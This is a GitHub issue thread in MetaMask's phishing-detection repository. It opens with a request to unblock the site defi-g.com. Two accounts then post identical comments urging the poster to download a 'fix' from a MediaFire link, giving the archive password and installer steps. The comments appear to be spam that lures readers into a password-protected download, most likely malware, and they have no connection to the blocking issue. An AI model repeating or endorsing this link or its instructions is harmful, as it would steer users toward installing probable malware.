### ISSUE TITLE
[Legitimate Site Blocked] www.defi-g.com

### ISSUE THREAD

**Issue by Americano00** [MetaMask/eth-phishing-detect#78937]
https://www.defi-g.com/

please unblock my website. it is not malicious !

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
